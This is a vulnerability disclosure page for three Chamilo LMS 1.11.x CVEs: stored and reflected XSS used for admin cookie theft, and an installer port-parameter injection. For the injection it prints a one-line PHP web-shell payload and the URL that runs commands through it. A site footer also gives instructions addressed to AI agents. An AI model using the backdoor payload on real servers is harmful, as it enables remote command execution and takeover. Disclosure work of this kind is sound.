# Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
## [**CVE-2021-37391** ](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37391)**- From Stored XSS to account takeover**
{% hint style="success" %}
**Title:** From Stored XSS to account takeover\
**Vulnerability:** Stored XSS\
**CVE ID:** [CVE-2021-37391](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37391)\
**CVSS**: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
{% endhint %}
A user without privileges in Chamilo LMS 1.11.x can send an invitation message to another user, e.g., the administrator, through **main/social/search.php, main/inc/lib/social.lib.php** and steal cookies or execute arbitrary code on the administration side via a stored XSS vulnerability via social network the send invitation feature.
**Proof-of-Concept**
A guest user without privileges on the Chamilo LMS could send an invitation with a malicious message that could put at risk the administrator's privacy. Basically, it was possible to take advantage of a stored XSS vulnerability and stole the authentication token of another user - in this case, the administrator. This scenario could be abused to get access over the administrator account (takeover).
\
After that, click on "**Send message**" button.
On the admin side, the payload is executed by opening the invitations panel on the left menu.
By using a custom payload, it was possible to get the administrator's cookie and clone their session.
```
```
**Impact:** By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.
**Mitigation**: Update the Chamilo to the latest version.\
\
**Fix**:
**ExploitDB**:
## [CVE-2021-37390 ](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37390)- **Reflected XSS search mechanism**
{% hint style="success" %}
**Title:** Reflected XSS search mechanism \
**Vulnerability:** Reflected XSS\
**CVE ID:** [CVE-2021-37390](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37390)\
**CVSS**: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
{% endhint %}
A Chamilo LMS 1.11.14 reflected XSS vulnerability exists in **main/social/search.php=q** URI (social network search feature).
**Impact:** By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.
**Mitigation:** Update the Chamilo to the latest version.
**Fix**:
## CVE-2021-37389 - From Stored XSS to PHP backdoor implantation
{% hint style="success" %}
**Title:** From Stored XSS to PHP backdoor implantation\
**Vulnerability:** Stored XSS\
**CVE ID:** [CVE-2021-37389](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37390)\
**CVSS**: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H
{% endhint %}
Chamilo 1.11.14 allows stored XSS via **main/install/index.php** and **main/install/ajax.php** through the **port parameter**.
As expected, the sent **payload will be stored on the config.php** file on the web-server. As this parameter was not validated in the right way, it could be abused to implant a PHP backdoor on the web-server by using the port parameter to inject the malicious payload presented below.
**Target payload:**
```
3306';echo system($_GET["cmd"]);
```
{% hint style="warning" %}
The values will be written into your configuration file **app/config/configuration.php** :sunglasses:
{% endhint %}
We got it :sunglasses:
```
http://localhost/chamilo/app/config/configuration.php?cmd=id
```
### BONUS: Another XSS's
During the installation process, a lot of fields are also vulnerable to stored XSS, namely:
* **Administrator login**
* **Administrator first name**
* **Administrator last name**
* **Administrator email**
* **Your personal name; and**
* **Your company short name**
As a result, the payloads are stored in the database and reflected on the website.
**Impact:** By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.
In addition, the port parameter can be also used to implant a PHP backdoor on the web-server.
**Mitigation:** Update the Chamilo to the latest version.
**Fix**:
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.